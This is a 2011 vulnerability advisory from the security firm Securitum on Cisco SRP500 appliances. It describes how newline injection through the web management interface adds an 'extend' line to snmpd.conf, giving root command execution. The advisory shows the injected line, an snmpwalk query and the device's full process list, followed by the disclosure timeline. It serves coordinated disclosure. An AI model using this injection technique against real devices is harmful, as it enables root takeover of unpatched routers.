Cisco SRP500 OS ROOT
About Cisco SRP500 Series
Cisco SRP 500 is a small business pro appliance which offers such features as (information from cisco.com): "Integrated security, VPN capabilities, and an 802.11n wireless access point", "(SIP) stack to deliver clear, high-quality voice service" or "Intelligence to support voice, data, security, and application services".
The appliance can be managed via web management console.
The vulnerabilities were tested on Cisco SRP527W (firmware: V1.01.19; Cisco confirmed that all firmwares prior to version 1.1.24 are affected)
Image copyright Cisco.com
Details
SNMPD configuration file injection.
Due to lack of proper validation in web interface one can inject a line to snmpd.conf allowing for OS command execution as root.
Steps:
- Logging into web management
- Injecting "extend ps /bin/ps" line using %0a and the following HTTP request:
- Querying the device using snmpwalk:
$ snmpwalk -v 1 -c public 192.168.15.1 NET-SNMP-EXTEND-MIB::nsExtendOutput1Table NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."ps" = STRING: PID USER VSZ STA T COMMAND NET-SNMP-EXTEND-MIB::nsExtendOutputFull."ps" = STRING: PID USER VSZ STAT COMMAND 1 admin 4472 S /sbin/init 2 admin 0 SW< [kthreadd] 3 admin 0 SWN [ksoftirqd/0] 4 admin 0 SW< [events/0] 5 admin 0 SW< [khelper] 39 admin 0 SW< [kblockd/0] 53 admin 0 SW [crypto] 54 admin 0 SW [crypto_ret] 59 admin 0 SW [pdflush] 60 admin 0 SW [pdflush] 61 admin 0 SW< [kswapd0] 62 admin 0 SW< [aio/0] 183 admin 0 SW< [mtdblockd] 184 admin 0 SW< [nftld] 280 admin 4160 S /sbin/init 282 admin 3464 S router_provisioning 283 admin 2440 S ledapp & 346 admin 1888 S hotplug_3g 347 admin 3532 S usb_3g 358 admin 0 SW< [khubd] 437 admin 0 SWN [jffs2_gcd_mtd8] 440 admin 0 SWN [jffs2_gcd_mtd3] 477 admin 0 SW< [loop0] 478 admin 0 SWN [jffs2_gcd_mtd4] 479 admin 0 SWN [jffs2_gcd_mtd6] 551 admin 1552 S syslogd -L -s 20 -b 1 553 admin 1552 S klogd 555 admin 2504 S cpu_load 556 admin 1980 S sh -c mpstat 2 557 admin 1628 S mpstat 2 560 admin 3172 S tftpd -a 192.168.15.1 -s /tmp -c -l 561 admin 1704 S cron 579 admin 4500 S httpd 583 admin 1760 S dnsmasq -C /tmp/dnsmasq.conf -r /tmp/dns_resolv.conf 599 admin 3784 S upnpd br0 609 admin 2068 S dropbear -d /etc/dropbear_dss_host_key -r /etc/dropbe 610 admin 18096 S cdpd 614 admin 3060 S cmd_server 692 admin 1980 S /bin/sh /etc/start_voice 700 admin 1552 S /usr/sbin/udhcpd /tmp/udhcpd_0.conf 706 admin 1552 S /usr/sbin/udhcpd /tmp/udhcpd_1.conf 728 admin 23144 S /sbin/spr_voip 913 admin 6308 R snmpd -c /tmp/snmpd.conf 1503 admin 1984 R /bin/ps 0.0.0.0/0.0.0.0 NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."ps" = INTEGER: 45 NET-SNMP-EXTEND-MIB::nsExtendResult."ps" = INTEGER: 0
Vendor's reaction / issue history
- 12.07.2011 - full disclosure sent to the vendor
- 16.09.2011 - initial, internat fix issued by the vendor
- 02.11.2011 - patch issued by the vendor, Cisco public announcement
- 25.11.2011 - public disclosure by Securitum
Thanks to Gaweł Mikołajczyk for providing test hardware.
Research / contact
- We are performing research on web management interfaces on network appliances. If you want to help, feel free to contact as @ devices_hacking@securitum.pl
Disclaimer
- All the information is provided for educational use only.
- We strongly discourage to use the information for cracking / illegal purposes.
- We are not responsible for damages made to your router - play with your router carefully.
Michal Sajdak
michal.sajdak@securitum.pl
michal.sajdak@securitum.pl
Szkolenie: monitoring bezpieczeństwa sieci
